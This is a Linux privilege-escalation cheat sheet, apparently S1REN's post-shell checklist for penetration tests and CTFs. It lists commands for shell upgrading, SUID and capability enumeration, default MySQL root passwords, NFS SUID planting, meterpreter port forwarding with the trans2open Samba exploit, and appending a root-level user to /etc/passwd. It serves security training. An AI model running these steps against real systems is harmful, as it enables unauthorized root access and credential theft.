Please Wait
Linux Privilege Escalation - Resources

Linux Privilege Escalation


What's my path to root?

g0tmilk's Guide to Linux Privilege Escalation as well:

I just got a low-priv shell !
What would S1REN do right now?
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200

S1REN would say:
Various Capabilities?
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat

Compilation? (Very Back Burner)
file /bin/bash
uname -a
cat /etc/*-release
cat /etc/issue

What Arch?
file /bin/bash

uname -a

cat /etc/issue
cat /etc/*-release

Are we a real user?
sudo -l
ls -lsaht /etc/sudoers

Are any users a member of exotic groups?
groups <user>

Check out your shell's environment variables...

cd /home/
ls -lsaht

Web Configs containing credentials?
cd /var/www/html/
ls -lsaht

SUID Binaries?
find / -perm -u=s -type f 2>/dev/null

GUID Binaries?
find / -perm -g=s -type f 2>/dev/null

SUID/GUID/SUDO Escalation:

Binary/Languages with "Effective Permitted" or "Empty Capability" (ep):
Get Granted/Implicit (Required by a Real User) Capabilities of all files recursively throughout the system and pipe all error messages to /dev/null.
getcap -r / 2>/dev/null

We need to start monitoring the system if possible while performing our enumeration...
In other words:
"S1REN... Is privilege escalation going to come from some I/O file operations being done by some script on the system?"
cd /var/tmp/
File Transfer --> pspy32
File Transfer --> pspy64
chmod 755 pspy32 pspy64

What does the local network look like?
netstat -antup
netstat -tunlp

Is anything vulnerable running as root?
ps aux |grep -i 'root' --color=auto

MYSQL Credentials? Root Unauthorized Access?
mysql -uroot -p
Enter Password:
root : root
root : toor
root :

S1REN would take a quick look at etc to see if any user-level people did special things:
cd /etc/
ls -lsaht
Anything other than root here?
• Any config files left behind?
→ ls -lsaht |grep -i ‘.conf’ --color=auto

• If we have root priv information disclosure - are there any .secret in /etc/ files?
→ ls -lsaht |grep -i ‘.secret’ --color=aut

SSH Keys I can use perhaps for even further compromise?
ls -lsaR /home/

Quick look in:
ls -lsaht /var/lib/
ls -lsaht /var/db/

Quick look in:
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

File Transfer Capability? What can I use to transfer files?
which wget
which curl
which nc
which fetch (BSD)
ls -lsaht /bin/ |grep -i 'ftp' --color=auto

NFS? Can we exploit weak NFS Permissions?
cat /etc/exports

[On Attacking Machine]
mkdir -p /mnt/nfs/
mount -t nfs -o vers=<version 1,2,3> $IP:<NFS Share> /mnt/nfs/ -nolock
gcc suid.c -o suid
cp suid /mnt/nfs/
chmod u+s /mnt/nfs/suid
su <user id matching target machine's user-level privilege.>

[On Target Machine]
user@host$ ./suid

Where can I live on this machine? Where can I read, write and execute files?

Any exotic file system mounts/extended attributes?
cat /etc/fstab

Forwarding out a weak service for root priv (with meterpreter!):
Do we need to get a meterpreter shell and forward out some ports that might be running off of the Loopback Adaptor ( and forward them to any ( If I see something like Samba SMBD out of date on - we should look to forward out the port and then run trans2open on our own machine at the forwarded port.

Forwarding out netbios-ssn EXAMPLE:
meterpreter> portfwd add –l 139 –p 139 –r [target remote host]
meterpreter> background
use exploit/linux/samba/trans2open
set RPORT 139

Can we write as a low-privileged user to /etc/passwd?
openssl passwd -1
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren

crontab –u root –l

Look for unusual system-wide cron jobs:
cat /etc/crontab
ls /etc/cron.*

Bob is a user on this machine. What is every single file he has ever created?
find / -user miguel 2>/dev/null

Any mail? mbox in User $HOME directory?
cd /var/mail/
ls -lsaht